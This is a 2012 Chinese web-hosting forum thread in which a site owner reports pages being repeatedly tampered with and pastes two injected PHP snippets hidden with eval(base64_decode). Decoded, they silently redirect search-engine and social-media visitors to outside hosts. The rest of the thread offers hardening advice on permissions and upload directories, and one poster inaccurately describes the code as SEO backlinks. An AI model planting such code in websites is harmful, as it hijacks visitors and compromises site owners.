你们遭遇到网站不停被入侵者加神秘代码的事儿了么？

暮木娃娃

samer 发表于 2012-11-4 09:59 AM
主机侦探现在有两个论坛了，一个org结尾，一个com结尾，你回复的是org结尾的，你现在登入的是com结尾的， ...

嗯嗯，用户名在两个论坛都可以用，是很容易弄混的
登进去的时候注意点啊。com是绿色的，org是蓝色的

aixue

屡次被入侵找到解决办法了。
其实是我为了方便，把所有的网站根目录都设置成了“可写”，这给网站安全造成极大的隐患，后来，我只在每个网站的根目录“Read        (Directory contents are visible to users)”选项前面打上勾，也就是允许读，就解决了，如今已经半个月没被入侵了，以前几乎两三天就被篡改。注意，网站里的数据库和图片文件夹等，还是要单独设置成可写的，否则你无法上传图片和更新。

aixue

samer 发表于 2012-10-13 10:49 AM
我昨天试过，可以解密啊，你只要复制括号里面被加密的内容就可以了，前面哪两个英文单词不用复制，我昨天 ...

不对啊，这个帖子我回复过，可能网站数据出现问题，也就是论坛丢数据了。我回复过你的，并且致谢了，的确是，这个网站能用，是我拷贝代码多拷贝了几个字母进入，所以无效。

samer

aixue 发表于 2012-11-4 04:12 AM
不对啊，这个帖子我回复过，可能网站数据出现问题，也就是论坛丢数据了。我回复过你的，并且致谢了，的确 ...

主机侦探现在有两个论坛了，一个org结尾，一个com结尾，你回复的是org结尾的，你现在登入的是com结尾的，com结尾的是近段时间才启用的，数据肯定没有org的新，所以你之前回复的应该在org里面

samer

aixue 发表于 2012-10-13 01:13 AM
这个解密站我试过，没用。

我昨天试过，可以解密啊，你只要复制括号里面被加密的内容就可以了，前面哪两个英文单词不用复制，我昨天解密了你其中一个，发现这段代码应该是seo的外链代码，应该是用来把你站的权重分配到黑客的其他网站上面，让他的网站在google上面可以有更好的排名，我看过里面的网站，都是英文站，看来是外国黑客的所为。

aixue

我近几个月，网站空间的很多页面，不停的被入侵者加经过加密的代码，导致网站打不开，简直疯狂之极，前天网站被篡改后，我昨天上传备份的正常页面去覆盖，今天起床后又被篡改了，而这已经是近半年来的无数回了，只是这几次更频繁一些，往常，我上传正常页面覆盖被篡的页面之后，能管个一星期左右正常，但是，像这次，被篡改之后，我修复，第三天又被他篡，实属罕见，而且，我的网站由于常年打不开，网速慢，访问率极低，最多一天百十个IP，不知此人到底何意图。

神秘的是，往年网站被入侵，多是ASP程序，一般都是利用程序漏洞，黑客掌握上传图片的权限后，把一个尾缀为JPG的假的图片——实际上是黑客挂马程序，上传到空间，这个黑客挂马程序，本身可以挂马，可以随意添加代码，但是也可以查杀木马，我掌握这个东西之后，反倒经常利用这个程序在自己空间上查找木马，但是这个工具，在GD的空间无效（不仅是因为PHP的缘故，是对我空间的ASP程序都无效了）。以前网站被这些黑客入侵并挂马，除了黑客遗留在我空间上的挂马工具可以查杀之外，还有一条，在自己空间上查找文件修改日期与绝大多数文件日期不同的，并且是最近上传和修改的文件，往往都是黑客上传的或篡改了的文件，我就是利用这个简单的规律，从自己网站上找出过很多的被人嵌的小偷程序，以及被人入侵后挂广告，挂木马的问题。但是，现在在GD被此人入侵和篡改的网页日期，文件日期上竟然没有任何异样，实在令人匪夷所思，也就是利用我以前掌握的简单规律查找哪个文件被篡改，已经无效了，所以，我每次发现网站打不开了，就只得上传我所有备份的正常网页去覆盖，所以相当的耗时耗力。原本想找GD官方解决，却觉得这个问题很难说明，特别还要用英语，所以，一直在折腾自己，反复上传。

下面是我拷贝的此黑客在我网页上挂的加密代码的一部分：

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vc21vb3RoLnlndG8uY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));


eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZG5zLWRucy5kbnMtZG5zLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

samer

你发个网址我看看是不是有什么漏洞你没有发现了

samer

如果是liunx系统的话，可以通过.htacess来控制一些目录没有执行权限，例如uploads 、upfile目录，windows系统用asp的话，建议你还是检查清楚你的asp网址是不是有注入漏洞，网站的后台管理是不是太容易暴露地址，再检查一下数据库，如果用*.mdb的数据库，修改一下数据库路径和文件名，如果用mssql的话，建议还是注意注入漏洞。

aixue

samer 发表于 2012-10-12 12:54 PM
你发个网址我看看是不是有什么漏洞你没有发现了

大神，给网址就能看出漏洞？至少也的得到全部的文件才看得出吧？我这是GD的空间，服务器漏洞，你能测出来，也跟我网站无关吧。我的网站就是PW8.7版的程序。

aixue

samer 发表于 2012-10-12 01:05 PM
如果是liunx系统的话，可以通过.htacess来控制一些目录没有执行权限，例如uploads 、upfile目录，windows系 ...

谢谢了，正因为自己空间上有几个ASP的站，所以，一直没有换成Liunx系统，非常苦恼。